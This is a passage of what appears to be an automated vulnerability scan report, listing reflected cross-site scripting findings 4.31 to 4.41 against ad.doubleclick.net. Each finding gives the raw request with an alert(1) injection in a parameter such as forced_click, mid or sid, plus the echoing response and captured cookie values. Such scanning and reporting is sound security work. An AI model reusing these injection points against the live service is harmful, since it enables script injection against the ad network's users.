The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 406a9'-alert(1)-'46cf963601 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=406a9'-alert(1)-'46cf963601 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6072
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 17:18:25 GMT
Expires: Sun, 20 Mar 2011 17:18:25 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ad0/7/7d/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=406a9'-alert(1)-'46cf963601https://chrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc?utm_source=en-oa-na-us-N5295.150800.VALUECLICK&utm_medium=oa&utm_campaign=en\">
...[SNIP]...

4.31. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [forced_click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.150800.VALUECLICK/B5319645.4

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89a5d"-alert(1)-"fcb19aa1da5 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=89a5d"-alert(1)-"fcb19aa1da5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6076
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 17:18:21 GMT
Expires: Sun, 20 Mar 2011 17:18:21 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ad0/7/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=89a5d"-alert(1)-"fcb19aa1da5https://chrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc?utm_source=en-oa-na-us-N5295.150800.VALUECLICK&utm_medium=oa&utm_campaign=en");
var fscUrl = url;
var fscUrlClickTagFound =
...[SNIP]...

4.32. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.150800.VALUECLICK/B5319645.4

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9246"-alert(1)-"5a9c202837b was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3f9246"-alert(1)-"5a9c202837b&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:15:29 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:15:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6130

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3f9246"-alert(1)-"5a9c202837b&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3De
...[SNIP]...

4.33. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.150800.VALUECLICK/B5319645.4

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90ca9'-alert(1)-'3b957cae5d0 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=390ca9'-alert(1)-'3b957cae5d0&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:15:33 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:15:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6130

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=390ca9'-alert(1)-'3b957cae5d0&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3De
...[SNIP]...

4.34. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.150800.VALUECLICK/B5319645.4

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14d97'-alert(1)-'85cdf973d14 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=53925114d97'-alert(1)-'85cdf973d14&m=3&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:14:50 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:14:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6130

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=53925114d97'-alert(1)-'85cdf973d14&m=3&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign
...[SNIP]...

4.35. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.150800.VALUECLICK/B5319645.4

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f83c6"-alert(1)-"cb65c717218 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251f83c6"-alert(1)-"cb65c717218&m=3&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:14:46 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:14:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6130

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251f83c6"-alert(1)-"cb65c717218&m=3&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign
...[SNIP]...

4.36. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.150800.VALUECLICK/B5319645.4

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec0e7'-alert(1)-'221eec829b was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857ec0e7'-alert(1)-'221eec829b&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:16:16 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:16:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6126

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ck.net/click%3Bh%3Dv8/3ad0/f/7d/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857ec0e7'-alert(1)-'221eec829b&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den\">
...[SNIP]...

4.37. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.150800.VALUECLICK/B5319645.4

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28d80"-alert(1)-"d667948a37d was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=4785728d80"-alert(1)-"d667948a37d&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:16:12 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:16:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6130

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ck.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=4785728d80"-alert(1)-"d667948a37d&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den");
var
...[SNIP]...

4.38. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.150800.VALUECLICK/B5319645.4

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff1ca"-alert(1)-"487523993d2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503ff1ca"-alert(1)-"487523993d2&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:14:16 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:14:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6130

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
cape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503ff1ca"-alert(1)-"487523993d2&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26u
...[SNIP]...

4.39. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.150800.VALUECLICK/B5319645.4

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27e79'-alert(1)-'ef9404d6e79 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=28850327e79'-alert(1)-'ef9404d6e79&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:14:20 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:14:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6130

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ref=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=28850327e79'-alert(1)-'ef9404d6e79&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26u
...[SNIP]...

4.40. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [tp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.150800.VALUECLICK/B5319645.4

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60aad'-alert(1)-'e72e3365ae1 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=760aad'-alert(1)-'e72e3365ae1&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:17:42 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:17:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6130

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ick%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=760aad'-alert(1)-'e72e3365ae1&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den\">
...[SNIP]...

4.41. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [tp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.150800.VALUECLICK/B5319645.4

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2dd35"-alert(1)-"77d42671dca was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=72dd35"-alert(1)-"77d42671dca&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:17:38 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:17:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6130

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
